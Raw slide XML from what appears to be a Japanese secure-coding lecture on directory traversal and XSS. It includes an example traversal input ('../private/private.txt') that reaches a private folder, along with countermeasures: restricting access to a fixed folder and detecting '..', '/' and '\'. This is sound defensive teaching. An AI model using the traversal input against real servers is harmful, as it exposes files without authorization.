              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ファイル名の指定に「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>../private/private.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」とする</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE96B256-69B6-BADE-3C00-8CA2EC5DBCF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2910883"/>
            <a:ext cx="10515600" cy="2058478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23756943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BA7BFA-B1E3-DA07-A154-87A4CEB0D714}"/>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69EA5222-2D03-07EC-B0F3-F234E7E85088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>作成者の意図しないファイルアクセス</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>秘密フォルダ内のファイルにアクセスされる。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE08E5A-A3EE-9F3A-2906-21DC9AF7CEED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2833357"/>
            <a:ext cx="10515600" cy="2183883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13700448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1C9681-788D-66A8-389F-50F8DF8A7C81}"/>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088071A1-E57B-24B8-25B8-7CE9BF704F50}"/>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根本的解決</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>プログラムから使うフォルダをあらかじめ定義しておき、パラメータから渡されるファイル名までのパスではパスの末端のファイル名のみ使用する。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>定義するフォルダ　→</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>static/public/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>渡されたファイル名→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>../private/private.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>アクセスするパス　→</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>static/public/private.txt</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="正方形/長方形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2D213A-5270-6443-BE92-45D5ECE07E9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="5168348"/>
            <a:ext cx="1728083" cy="4373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D5EF42E-D22B-7EF9-306D-9A48ADFA7585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8165990" y="4659464"/>
            <a:ext cx="2954655" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>これだけを取り出す</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="コネクタ: カギ線 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08C24791-936C-E58C-0C91-D713E2A03EBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8600761" y="4344452"/>
            <a:ext cx="265880" cy="1819235"/>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91833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8A08C5-629E-57DF-4D94-D2CA0F697294}"/>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545D7659-AFC3-F650-118D-64DF15DCA630}"/>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サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CADF9E8-EF0A-CDF4-A6E7-E938811A9EC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2625220" y="2242427"/>
            <a:ext cx="6941560" cy="4250448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23506386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4185D6-A023-85A6-4AC0-E81CAEF7D697}"/>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367B46DD-E210-C976-8C93-C3C1F0548548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル対策</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常アクセス：ブラウザ側</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED91117-45B7-CD95-C5ED-47C105BA7C81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532888" y="2322485"/>
            <a:ext cx="9126224" cy="2372056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{724A7E6A-1DF8-0F6C-E9A0-2174D4C8A4D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475203" y="4694541"/>
            <a:ext cx="3241593" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ublic.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」と入力した場合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6192482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994922-4613-2BCC-DC94-D1D3A1151B8B}"/>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A49A4B45-1477-8138-DBEC-01D8351C4441}"/>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不正アクセス：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ファイル名のみを取り出しフォルダ固定をするためファイルが存在しない場合はサーバ側のエラーになりアクセスできなくなる。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65CB3DF-A46D-771C-3380-0755A0FEA115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1955538" y="3251059"/>
            <a:ext cx="8280923" cy="2546465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FEA707C-4D0C-D562-6E75-04D6DE90FBAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840413" y="5864993"/>
            <a:ext cx="4511171" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>../private/private.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」と入力した場合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37336117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5368A0-4F06-751F-25C9-F6C62D564246}"/>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DCA4DF84-727B-1351-7A57-F1A9564CC7F4}"/>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保険的対策①</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正な文字列の検知</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリ移動に使用される文字列は「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」や「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」や「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」であるため、これらの文字列が含まれる場合に不正アクセスとみなす。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3394424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FF859B-444E-538E-AAF8-C6206D371F8A}"/>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FC3116AD-4D95-FD91-5B7A-156C6968CE11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の仕組み</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>入力フォームに入力した内容やデータベースに</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のコードを入れることで、レスポンスに返す</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のコードを埋め込む。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17762870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57B532-9B73-9BA9-3AAD-039439C8E8C1}"/>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29AE50BA-E01D-6E5B-C50D-44D7749D784B}"/>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サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正な文字列の検知</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE56CBCF-6946-F8AE-2C7A-1DF4FD4668A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4460681" y="2225563"/>
            <a:ext cx="6732729" cy="4529069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19139982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750ACA-1397-A280-40C9-B6F282847668}"/>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6786CC04-22D4-3D27-564D-45996026D856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル対策</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正な文字列の検知</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」も「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」も「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」も含まないため表示される</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C46C150-CC9E-04D6-66A8-1B51C0A7E247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1537651" y="3291008"/>
            <a:ext cx="9116697" cy="2438740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE9FBCC3-DF0E-B850-911B-9094CE7357C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475202" y="5768689"/>
            <a:ext cx="3241593" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」と入力した場合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17050101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39AB4-8D10-4856-61C8-2870F94E4BAF}"/>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9E90C25B-75E5-FBDB-4FA5-D86F7EFB2286}"/>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不正アクセス：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正な文字列の検知</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で渡された文字列に「</a:t>
            </a:r>
            <a:r>
